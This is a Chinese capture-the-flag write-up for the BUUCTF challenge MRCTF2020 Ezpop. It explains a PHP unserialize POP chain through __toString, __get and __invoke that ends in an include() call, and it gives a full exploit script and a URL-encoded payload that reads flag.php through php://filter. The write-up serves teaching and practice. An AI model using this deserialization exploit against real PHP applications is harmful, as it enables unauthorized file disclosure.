bug小空
bug小空

BUUCTF [MRCTF2020]Ezpop解题思路

题目代码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

前置知识

php魔术方法:

  • __call() : 在对象中调用一个不可访问方法时, __call() 会被调用
  • __toString: 将对象当作一个字符串输出的时候
  • __wakeup: 反序列化时被调用
  • __invoke: 当一个对象被作为函数调用时被调用
  • __get: 当对象访问一个不存在的属性时调用
  • __construct:创建对象时调用

序列化只会保存对象的属性对应的值

分析

这里找到危险参数 ,发现在 Modifier 对象中

public function __invoke(){
        $this->append($this->var);
    }

我们顺着这个魔术方法找哪里调用了变量函数
Test对象中

public function __get($key){
        $function = $this->p;
        return $function();
    }

再顺着这个魔术方法的调用条件找哪里访问了Test对象中没有的变量

    public function __toString(){
        return $this->str->source;
    }

我们找到了Show对象吗,只要我们将str变量设置为Test对象,那么就能触发这个利用链

再找到输出变量的地方

$this->source

在Show对象中,如果我们将source设置为Show对象,那么就等于将该对象当作字符串进行访问从而触发 __tostring方法

BUUCTF [MRCTF2020]Ezpop解题思路_第1张图片

EXP


<?php
class Modifier
{
    protected  $var;
    function __construct($var)
    {
        $this->var = $var;
    }
}

class Show
{
    public $source = 0;
    public $str = 0;
    
}

class Test
{
    public $p;
}

$data = "php://filter/read=convert.base64-encode/resource=flag.php";   # 最终这里被include

$m = new Modifier($data);

$t = new Test();
$t->p = $m ;

$s1 = new Show();
$s2 = new Show();

$s2->str = $t;
$s1->source = $s2;

echo urlencode(serialize($s1));

最终我们include(“php://filter/read=convert.base64-encode/resource=flag.php”)即可读取flag.php文件从而拿到flag

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bi%3A0%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3Bi%3A0%3B%7D

你可能感兴趣的:(php,网络安全)

  • 密码学与网络安全 - 11 密码学Hash函数 shiyivei #密码学与网络安全哈希算法web安全安全Hash函数消息认证
    11密码学Hash函数Hash函数输入长度可变,而输出长度固定合格的Hash函数输出应该均匀分布,看起来随机Hash函数两个要求:1.抗碰撞性(找到两个不同的输入对应相同的输出在计算上不可行),2.单向性(通过Hash值找到输入值在计算上不可行)Hash函数的操作过程:把输入数据的长度填充成固定长度分组的整数倍,填充内容包括原始消息的位长度信息,填充长度信息能够增加攻击者更改数据而要保持hash值
  • 在 Ubuntu 下通过 Docker 部署 Caddy 和 PHP-FPM 服务器 reddingtons 服务器ubuntudocker
    引言大家好,今天我们要聊的主题是如何在Ubuntu上通过Docker部署Caddy和PHP-FPM服务器。Caddy是一个现代化的web服务器,支持HTTPS,配置简单;而PHP-FPM是PHP的FastCGI进程管理器,能够高效处理PHP请求。二者结合,简直是开发者的福音。Docker、Caddy和PHP-FPM简介Docker是一个开源的容器化平台,允许开发者轻松打包、分发和运行应用。通过Do
  • NAT和内网穿透 物与我皆无尽也 计算机网络网络服务器运维计算机网络java
    NAT(NetworkAddressTranslation,网络地址转换)是一种广泛应用于计算机网络的技术,其主要目的是为了解决IPv4地址空间的短缺问题,并且增强网络安全。NAT技术允许一个私有网络内的多个设备共享一个或几个全局唯一的公共IP地址访问互联网。1地址划分在A、B、C分类地址,实际上有分公有IP地址和私有IP地址。2NAT当一个私有网络中的设备需要访问互联网时,NAT设备(通常是路由
  • 2024 年综合网络安全审计清单 网络研究观 网络研究观网络安全审计清单分析
    在网络威胁不断演变的时代,确保组织数据和系统的安全至关重要。全面的网络安全审核清单可以在实现这一目标方面发挥关键作用。但是,什么才是有效的网络安全审核清单呢?以及如何对其进行定制以满足您组织的独特需求?了解网络安全审核清单的重要性、前20个基本条目以及如何对其进行自定义以满足您组织的特定要求。关键点了解网络安全审核清单的重要性并探索其中最重要的20个条目。采用主动风险管理、资产和数据管理策略、安全
  • 网络安全清单 网络安全Max web安全智能路由器安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快移除(Deprovisioning)移除(Deprovisioning)是一个除去现存用户帐户的过程,其包括用户帐户登记和设备失效。分布式编码规则(DER:DistinguishedEncodingRules)分布式编码规则(DER)是一个基本编码规则的子集,其提供一个严密的方法来描述任何ASN.1值来作为一个8位字节的字符串。指定网桥(
  • 基于Python的网络漏洞扫描系统的设计与实现 毕设工作室_wlzytw python论文项目python网络开发语言djangotornadodashpygame
    摘要随着互联网不断发展、贴近生活,电子化的生活安全依赖着网络安全。在漏洞泛滥的今天,网络安全状态不容乐观,许多机构都因没有及时处理漏洞导致被恶意入侵,若网络安全保护不当,将会影响现实安全。中小型网络运维人员常因为外部因素影响难以开展网络安全行动。为了应对这一问题,本文研究尝试用Python语言尝试做一个集成漏洞扫描系统的设计与实现。运用以Python为基础的DjangoWeb框架实现快速的业务开发
  • 基于 Python 的漏洞扫描工具的设计与实现 计算机毕业设计指导 python开发语言信息安全
    引言随着信息技术的快速发展,网络安全问题成为了各类组织和个人面临的重要挑战之一。漏洞是网络安全中的一个重要问题,黑客和恶意攻击者往往通过利用这些漏洞来侵入系统,窃取敏感信息或进行其他恶意行为。因此,及时发现和修复漏洞是确保网络安全的重要手段。本项目旨在设计和实现一个基于Python的漏洞扫描工具,帮助用户快速发现系统中的潜在漏洞,并提供修复建议。该工具将包括对Web应用程序、操作系统、服务等的漏洞
  • RabbitMQ复习 SJLoveIT rabbitmq分布式
    消息中间件的作用:(1)异步处理(2)应用解耦(3)流量削峰消息中间件的缺点:引入了新的东西,也就增加了新的故障点。比如消息中间件挂了,影响系统的可用性。两种框架:JMS和AMQP最大的区别是JMS是是javaapi,对跨平台的支持较差,但在纯java技术栈内首选。AMQP是跨平台的,序列化方式选json,不管你是java,php,C/C++,python,都能处理RabbitMQ实现的事AMQP
  • 828华为云征文 | 使用Flexus云服务器X实例部署GLPI资产管理系统 降世神童 高级IT运维技术专栏华为云nginxmysql
    828华为云征文|使用Flexus云服务器X实例部署GLPI资产管理系统1.部署环境说明2.部署基础环境2.1.操作系统基本配置2.2.部署Nginx2.3.部署MySQL2.4.部署PHP3.部署GLPI资产管理系统1.部署环境说明  本次环境选择使用华为云Flexus云服务器X实例,因为其具有高性能的计算能力、灵活的资源配置、稳定的运行环境、高效的网络访问速度、服务的高可用性保证以及多层次的数
  • PHP Captcha实现图片验证码生成及识别(附源码) mayday1102 PHPphpcaptcha
    目录什么是Captchacomposer安装思路修改Captcha.php源码调用什么是CaptchaCAPTCHA(CompletelyAutomatedPublicTuringTesttoTellComputersandHumansApart)是区分计算机和人类的一种程序算法。composer安装composerrequirephp-quickorm/captcha思路由于原扩展基于sessi
  • 关于解决shell脚本中无法用cd命令,在指定文件下运行指定文件的解决方法分享 Ramphastos1101 phplinux服务器bash
    本人以编写shell脚本,一键安装配置php7.3为例前提:本脚本在Linux/opt/目录下运行首先解压php压缩包######配置nginx,带lua支持#################################################tar-zxvf/opt/php-7.3.30.tar.gzif[$?-eq0];thenecho`date"+%y-%m-%d%H:%M:%S
  • PHP For 循环 web13688565871 面试学习路线阿里巴巴phpandroidjava
    基本概念For循环的结构在PHP编程中,for循环是一种强大的控制结构,用于重复执行特定代码块。其语法结构由三个关键部分组成:初始化表达式、条件表达式和更新表达式。这种结构设计使得for循环特别适合处理已知迭代次数的任务。for循环的基本语法如下:for(初始化表达式;条件表达式;更新表达式){//循环体}初始化表达式初始化表达式在循环开始前执行一次,通常用于设置循环计数器或其他必要的变量。例如:
  • 大模型WebUI:Gradio全解12——LangChain原理、架构和组件(3) 龙焰智能 LangChain架构Integration包LangGraphLangGraph平台LangSmithLangfuse
    大模型WebUI:Gradio全解12——LangChain原理、架构和组件(3)前言本篇摘要12.LangChain原理及agents构建GradioUI12.3LangChain架构12.3.1LangChain12.3.2IntegrationPackages1.概念2.示例12.3.3LangGraph1.概念2.示例12.3.4LangGraphPlatform1.概览2.优势分析12.
  • 计算机网络学编程吗,网络安全要学编程吗 啊倩 计算机网络学编程吗
    网络编程从大的方面说就是对信息的发送到接收,中间传输为物理线路的作用。网络安全要学编程吗?佰佰安全网看看吧。网络安全的任何一项工作,都必须在网络安全组织、网络安全策略、网络安全技术、网络安全运行体系的综合作用下才能取得成效。首先必须有具体的人和组织来承担安全工作,并且赋予组织相应的责权;其次必须有相应的安全策略来指导和规范安全工作的开展,明确应该做什么,不应该做什么,按什么流程和方法来做;再次若有
  • python学习一 星光网络安全社 python学习python网络安全web安全
    学习网络安全为什么要学python?1、在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。2、python是一门编程语言经常用它来写脚本怎么学习python?1、通过本课程能够用python写基本的脚本2、在以后工作中多使用熟练使用那么就让我们先了解一下python
  • 网络安全审计员 网络安全-老纪 web安全网络安全
    在当今数字化时代,随着信息技术的迅猛发展,网络安全问题日益凸显,成为各行各业不容忽视的重要议题。特别是对于企业、政府机构等组织而言,网络安全不仅关乎数据资产的安全,更与组织的声誉、客户信任乃至法律法规的遵从性紧密相连。因此,网络安全审计员这一角色应运而生,他们在保障网络安全方面发挥着举足轻重的作用。网络安全审计员是负责监督和评估组织网络安全状况的专业人员。他们需具备深厚的网络安全知识,包括但不限于
  • 信息安全与网络安全有什么区别? 2401_84297944 程序员web安全网络安全
    信息安全包含哪些内容?1、硬件安全:即网络硬件和存储媒休的安全。要保护这些硬设施不受损害,能够正常工作。2、软件安全:即计算机及其网络r各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效,不被非法复制。3、运行服务安全:即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运
  • PHP 5 Math 函数 宇哥资料 phpphp开发语言
    PHPMath简介Math函数能处理integer和float范围内的值。安装PHPMath函数是PHP核心的组成部分。无需安装即可使用这些函数。PHP5Math函数函数描述abs()返回一个数的绝对值。acos()返回一个数的反余弦。acosh()返回一个数的反双曲余弦。asin()返回一个数的反正弦。asinh()返回一个数的反双曲正弦。atan()返回一个数的反正切。atan2()返回两个变
  • CES Asia 2025前瞻:网络安全与数据隐私成焦点 赛逸展张胜 web安全安全
    在数字化转型的浪潮加速奔涌之际,网络安全与数据隐私已然成为企业发展版图中的核心关切。即将盛大启幕的CESAsia2025第七届亚洲消费电子技术贸易展(赛逸展),无疑将汇聚行业目光,成为探讨网络安全与数据隐私领域前沿趋势、创新技术以及法规动态的关键平台。零信任架构的普及走向、数据隐私法规的最新动向,以及量子加密技术蕴含的潜在影响,都备受瞩目,有望在展会上引发广泛关注与深入探讨。零信任架构:网络安全新
  • PHP 杂项 函数 宇哥资料 phpphpandroid开发语言
    PHP杂项函数简介我们把不属于其他类别的函数归纳到杂项函数类别。安装杂项函数是PHP核心的组成部分。无需安装即可使用这些函数。Runtime配置杂项函数的行为受php.ini文件中的设置的影响。杂项配置选项:名称默认描述可更改ignore_user_abort"0"FALSE指示只要脚本在客户机终止连接后尝试进行输出,脚本将被终止。PHP_INI_ALLhighlight.string"#DD00
  • 网络安全导论PDF 网络安全Ash pdf
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快这份重点是在准备复试时边看书和ppt边手打的。掐指一算已经是整整一个月前的事情惹。这本教材是哈工程复试参考书目,但是网络上关于它的材料比较少。把自己整理的重点放上来,希望能帮到期末、复试以及自学网络安全的小可爱♥网络安全2.1基本协议ARP地址解析协议:将局域网中的32bitIP地址→48bit物理地址(网卡的MAC地址)ARP欺骗:计算
  • 2025年入职/转行网络安全,该如何规划?网络安全职业规划 教网络安全的毛老师 web安全安全网络运维云计算
    网络安全是一个日益增长的行业,对于打算进入或转行进入该领域的人来说,制定一个清晰且系统的职业规划非常重要。2025年,网络安全领域将继续发展并面临新的挑战,包括不断变化的技术、法规要求以及日益复杂的威胁环境。以下是一个关于网络安全职业规划的详细指南,涵盖了从入门到高级岗位的成长路径、技能要求、资源获取等方面的内容。第一部分:网络安全行业概述1.1网络安全的现状与未来网络安全已经成为全球企业和政府的
  • 攻防世界web新手第四题easyphp 安全小王子 前端android
    6000000&&strlen($a)2022){if(is_array(@$c["n"])&&count($c["n"])==2&&is_array($c["n"][0])){$d=array_search("DGGJ",$c["n"]);$d===false?die("no..."):NULL;foreach($c["n"]as$key=>$val){$val==="DGGJ"?die("no
  • 攻防世界-web- easyphp 32进制 ctfweb攻防世界CTFphp开发语言
    #攻防世界-web-easyphp依次构造a、b、c的值!";break;}$i++;}//$c=array("m",2022,array("n","DGGJ","DGGJ"));//echojson_encode($c);//$c=json_encode($c);//shic={"m":"12345a","n":[[0,1,2],0]}$c=array("m",2022,array("n","D
  • 使用Idea创建springboot项目 奔跑吧邓邓子 SpringBoot深入浅出常见问题解答(FAQ)高效运维javaidea
    提示:“奔跑吧邓邓子”的高效运维专栏聚焦于各类运维场景中的实际操作与问题解决。内容涵盖服务器硬件(如IBMSystem3650M5)、云服务平台(如腾讯云、华为云)、服务器软件(如Nginx、Apache、GitLab、Redis、Elasticsearch、Kubernetes、Docker等)、开发工具(如Git、HBuilder)以及网络安全(如挖矿病毒排查、SSL证书配置)等多个方面。无论
  • 黑客工具介绍 嗨起飞了 网络安全网络安全网络攻击模型
    渗透测试红队工具箱深度解析:6大核心工具实战指南法律声明:本文所有工具及技术仅限用于合法授权的安全测试,使用者需遵守《网络安全法》及相关法律法规,擅自攻击他人系统将承担刑事责任。一、Nmap:网络侦察的全能之眼1.1工具原理剖析Nmap(NetworkMapper)采用TCP/IP协议栈指纹识别技术,通过发送定制化数据包分析响应差异,精准识别主机存活状态、开放端口及服务版本。其脚本引擎(NSE)支
  • 高性能PHP框架webman爬虫引擎插件,如何爬取数据 Ai 编码 php教程php爬虫开发语言
    文章精选推荐1JetBrainsAiassistant编程工具让你的工作效率翻倍2ExtraIcons:JetBrainsIDE的图标增强神器3IDEA插件推荐-SequenceDiagram,自动生成时序图4BashSupportPro这个ides插件主要是用来干嘛的?5IDEA必装的插件:SpringBootHelper的使用与功能特点6Aiassistant,又是一个写代码神器7Cursor
  • 使用Dockerfile搭建ubuntu20.04 + php8.2镜像
    编写Dockerfile最近在部署项目事,想做一个基于ubuntu20.04,搭建nginx+php8.*的镜像。但是在制作的过程中遇到了很多坑,记录下来供后续参考学习。修改镜像过程大概分为了6个模块:模块一:对ubuntu20.04官方镜像重新构造。模块二:在基础镜像添加php8.*的源模块三:安装nginx、php以及相关依赖。模块四:设置nginx、php配置文件模块五:编写nginx、ph
  • HW基线检查 kui954 HWlinux运维威胁分析HW面试
    windows,Linux的敏感文件Windows系统:C:\boot.ini//查看系统版本C:\windows\system32\SAM//账号密码文件C:\windows\php.ini//php配置信息C:\windows\my.ini//数据库配置文件Linux:/etc/passwd//账户信息/etc/shadow//账户密码文件/etc/my.conf//mysql配置文件Linu
  • 全新租赁小程序系统源码 基于ThinkPHP+UniApp开发的租赁商城小程序 专业软件系统开发 源码下载小程序租赁商城小程序源码租赁商城小程序租赁小程序系统源码
    内容目录一、详细介绍二、效果展示1.部分代码2.效果图展示三、学习资料下载一、详细介绍全新租赁小程序系统源码基于thinkphp+uniapp开发的租赁商城小程序基于thinkphp+uniapp开发的租赁商城小程序,提供用户物品租赁服务的应用程序方便客户搭建各种类型的租赁场景服务。通过小程序端多角色进行平台管理用户租赁商品缴纳租金及押金,员工端可操作商品出库和归还功能特性:1、装修模块可根据用户
  • Enum 枚举 120153216 enum枚举
    原文地址:http://www.cnblogs.com/Kavlez/p/4268601.html Enumeration 于Java 1.5增加的enum type...enum type是由一组固定的常量组成的类型,比如四个季节、扑克花色。在出现enum type之前,通常用一组int常量表示枚举类型。比如这样: public static final int APPLE_FUJI = 0
  • Java8简明教程 bijian1013 javajdk1.8
            Java 8已于2014年3月18日正式发布了,新版本带来了诸多改进,包括Lambda表达式、Streams、日期时间API等等。本文就带你领略Java 8的全新特性。  一.允许在接口中有默认方法实现         Java 8 允许我们使用default关键字,为接口声明添
  • Oracle表维护 快速备份删除数据 cuisuqiang oracle索引快速备份删除
    我知道oracle表分区,不过那是数据库设计阶段的事情,目前是远水解不了近渴。 当前的数据库表,要求保留一个月数据,且表存在大量录入更新,不存在程序删除。 为了解决频繁查询和更新的瓶颈,我在oracle内根据需要创建了索引。但是随着数据量的增加,一个半月数据就要超千万,此时就算有索引,对高并发的查询和更新来说,让然有所拖累。 为了解决这个问题,我一般一个月会进行一次数据库维护,主要工作就是备
  • java多态内存分析 麦田的设计者 java内存分析多态原理接口和抽象类
          “  时针如果可以回头,熟悉那张脸,重温嬉戏这乐园,墙壁的松脱涂鸦已经褪色才明白存在的价值归于记忆。街角小店尚存在吗?这大时代会不会牵挂,过去现在花开怎么会等待。       但有种意外不管痛不痛都有伤害,光阴远远离开,那笑声徘徊与脑海。但这一秒可笑不再可爱,当天心
  • Xshell实现Windows上传文件到Linux主机 被触发 windows
    经常有这样的需求,我们在Windows下载的软件包,如何上传到远程Linux主机上?还有如何从Linux主机下载软件包到Windows下;之前我的做法现在看来好笨好繁琐,不过也达到了目的,笨人有本方法嘛; 我是怎么操作的: 1、打开一台本地Linux虚拟机,使用mount 挂载Windows的共享文件夹到Linux上,然后拷贝数据到Linux虚拟机里面;(经常第一步都不顺利,无法挂载Windo
  • 类的加载ClassLoader 肆无忌惮_ ClassLoader
    类加载器ClassLoader是用来将java的类加载到虚拟机中,类加载器负责读取class字节文件到内存中,并将它转为Class的对象(类对象),通过此实例的 newInstance()方法就可以创建出该类的一个对象。   其中重要的方法为findClass(String name)。   如何写一个自己的类加载器呢? 首先写一个便于测试的类Student
  • html5写的玫瑰花 知了ing html5
    <html> <head> <title>I Love You!</title> <meta charset="utf-8" /> </head> <body> <canvas id="c"></canvas>
  • google的ConcurrentLinkedHashmap源代码解析 矮蛋蛋 LRU
    原文地址: http://janeky.iteye.com/blog/1534352 简述 ConcurrentLinkedHashMap 是google团队提供的一个容器。它有什么用呢?其实它本身是对 ConcurrentHashMap的封装,可以用来实现一个基于LRU策略的缓存。详细介绍可以参见 http://code.google.com/p/concurrentlinke
  • webservice获取访问服务的ip地址 alleni123 webservice
    1. 首先注入javax.xml.ws.WebServiceContext, @Resource private WebServiceContext context; 2. 在方法中获取交换请求的对象。 javax.xml.ws.handler.MessageContext mc=context.getMessageContext(); com.sun.net.http
  • 菜鸟的java基础提升之道——————>是否值得拥有 百合不是茶
    1,c++,java是面向对象编程的语言,将万事万物都看成是对象;java做一件事情关注的是人物,java是c++继承过来的,java没有直接更改地址的权限但是可以通过引用来传值操作地址,java也没有c++中繁琐的操作,java以其优越的可移植型,平台的安全型,高效性赢得了广泛的认同,全世界越来越多的人去学习java,我也是其中的一员      java组成:
  • 通过修改Linux服务自动启动指定应用程序 bijian1013 linux
    Linux中修改系统服务的命令是chkconfig (check config),命令的详细解释如下: chkconfig 功能说明:检查,设置系统的各种服务。 语  法:chkconfig [ -- add][ -- del][ -- list][系统服务] 或 chkconfig [ -- level  <</SPAN>
  • spring拦截器的一个简单实例 bijian1013 javaspring拦截器Interceptor
    Purview接口 package aop; public interface Purview { void checkLogin(); } Purview接口的实现类PurviesImpl.java package aop; public class PurviewImpl implements Purview { public void check
  • [Velocity二]自定义Velocity指令 bit1129 velocity
    什么是Velocity指令 在Velocity中,#set,#if, #foreach, #elseif, #parse等,以#开头的称之为指令,Velocity内置的这些指令可以用来做赋值,条件判断,循环控制等脚本语言必备的逻辑控制等语句,Velocity的指令是可扩展的,即用户可以根据实际的需要自定义Velocity指令   自定义指令(Directive)的一般步骤 &nbs
  • 【Hive十】Programming Hive学习笔记 bit1129 programming
    第二章 Getting Started 1.Hive最大的局限性是什么?一是不支持行级别的增删改(insert, delete, update)二是查询性能非常差(基于Hadoop MapReduce),不适合延迟小的交互式任务三是不支持事务2. Hive MetaStore是干什么的?Hive persists table schemas and other system metadata.
  • nginx有选择性进行限制 ronin47 nginx 动静 限制
    http { limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=5r/s;... server {... location ~.*\.(gif|png|css|js|icon)$ {
  • java-4.-在二元树中找出和为某一值的所有路径 . bylijinnan java
    /* * 0.use a TwoWayLinkedList to store the path.when the node can't be path,you should/can delete it. * 1.curSum==exceptedSum:if the lastNode is TreeNode,printPath();delete the node otherwise
  • Netty学习笔记 bylijinnan javanetty
    本文是阅读以下两篇文章时: http://seeallhearall.blogspot.com/2012/05/netty-tutorial-part-1-introduction-to.html http://seeallhearall.blogspot.com/2012/06/netty-tutorial-part-15-on-channel.html 我的一些笔记 ===
  • js获取项目路径 cngolon js
    //js获取项目根路径,如: http://localhost:8083/uimcardprj function getRootPath(){     //获取当前网址,如: http://localhost:8083/uimcardprj/share/meun.jsp     var curWwwPath=window.document.locati
  • oracle 的性能优化 cuishikuan oracleSQL Server
       在网上搜索了一些Oracle性能优化的文章,为了更加深层次的巩固[边写边记],也为了可以随时查看,所以发表这篇文章。     1.ORACLE采用自下而上的顺序解析WHERE子句,根据这个原理,表之间的连接必须写在其他WHERE条件之前,那些可以过滤掉最大数量记录的条件必须写在WHERE子句的末尾。(这点本人曾经做过实例验证过,的确如此哦!
  • Shell变量和数组使用详解 daizj linuxshell变量数组
    Shell 变量 定义变量时,变量名不加美元符号($,PHP语言中变量需要),如: your_name="w3cschool.cc" 注意,变量名和等号之间不能有空格,这可能和你熟悉的所有编程语言都不一样。同时,变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z)。 中间不能有空格,可以使用下划线(_)。 不能使用标点符号。 不能使用ba
  • 编程中的一些概念,KISS、DRY、MVC、OOP、REST dcj3sjt126com REST
    KISS、DRY、MVC、OOP、REST (1)KISS是指Keep It Simple,Stupid(摘自wikipedia),指设计时要坚持简约原则,避免不必要的复杂化。 (2)DRY是指Don't Repeat Yourself(摘自wikipedia),特指在程序设计以及计算中避免重复代码,因为这样会降低灵活性、简洁性,并且可能导致代码之间的矛盾。 (3)OOP 即Object-Orie
  • [Android]设置Activity为全屏显示的两种方法 dcj3sjt126com Activity
    1. 方法1:AndroidManifest.xml 里,Activity的 android:theme  指定为" @android:style/Theme.NoTitleBar.Fullscreen" 示例:   <application      
  • solrcloud 部署方式比较 eksliang solrCloud
    solrcloud 的部署其实有两种方式可选,那么我们在实践开发中应该怎样选择呢? 第一种:当启动solr服务器时,内嵌的启动一个Zookeeper服务器,然后将这些内嵌的Zookeeper服务器组成一个集群。  第二种:将Zookeeper服务器独立的配置一个集群,然后将solr交给Zookeeper进行管理   谈谈第一种:每启动一个solr服务器就内嵌的启动一个Zoo
  • Java synchronized关键字详解 gqdy365 synchronized
    转载自:http://www.cnblogs.com/mengdd/archive/2013/02/16/2913806.html 多线程的同步机制对资源进行加锁,使得在同一个时间,只有一个线程可以进行操作,同步用以解决多个线程同时访问时可能出现的问题。 同步机制可以使用synchronized关键字实现。 当synchronized关键字修饰一个方法的时候,该方法叫做同步方法。 当s
  • js实现登录时记住用户名 hw1287789687 记住我记住密码cookie记住用户名记住账号
    在页面中如何获取cookie值呢? 如果是JSP的话,可以通过servlet的对象request 获取cookie,可以 参考:http://hw1287789687.iteye.com/blog/2050040 如果要求登录页面是html呢?html页面中如何获取cookie呢? 直接上代码了 页面:loginInput.html 代码: <!DOCTYPE html PUB
  • 开发者必备的 Chrome 扩展 justjavac chrome
    Firebug:不用多介绍了吧https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench ChromeSnifferPlus:Chrome 探测器,可以探测正在使用的开源软件或者 js 类库https://chrome.google.com/webstore/detail/chrome-sniffer-pl
  • 算法机试题 李亚飞 java算法机试题
           在面试机试时,遇到一个算法题,当时没能写出来,最后是同学帮忙解决的。        这道题大致意思是:输入一个数,比如4,。这时会输出:           &n
  • 正确配置Linux系统ulimit值 字符串 ulimit
    在Linux下面部 署应用的时候,有时候会遇上Socket/File: Can’t open so many files的问题;这个值也会影响服务器的最大并发数,其实Linux是有文件句柄限制的,而且Linux默认不是很高,一般都是1024,生产服务器用 其实很容易就达到这个数量。下面说的是,如何通过正解配置来改正这个系统默认值。因为这个问题是我配置Nginx+php5时遇到了,所以我将这篇归纳进
  • hibernate调用返回游标的存储过程 Supanccy2013 javaDAOoracleHibernatejdbc
    注:原创作品,转载请注明出处。     上篇博文介绍的是hibernate调用返回单值的存储过程,本片博文说的是hibernate调用返回游标的存储过程。     此此扁博文的存储过程的功能相当于是jdbc调用select 的作用。 1,创建oracle中的包,并在该包中创建的游标类型。 ---创建oracle的程
  • Spring 4.2新特性-更简单的Application Event wiselyman application
    1.1 Application Event Spring 4.1的写法请参考10点睛Spring4.1-Application Event 请对比10点睛Spring4.1-Application Event 使用一个@EventListener取代了实现ApplicationListener接口,使耦合度降低; 1.2 示例 包依赖 <p
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他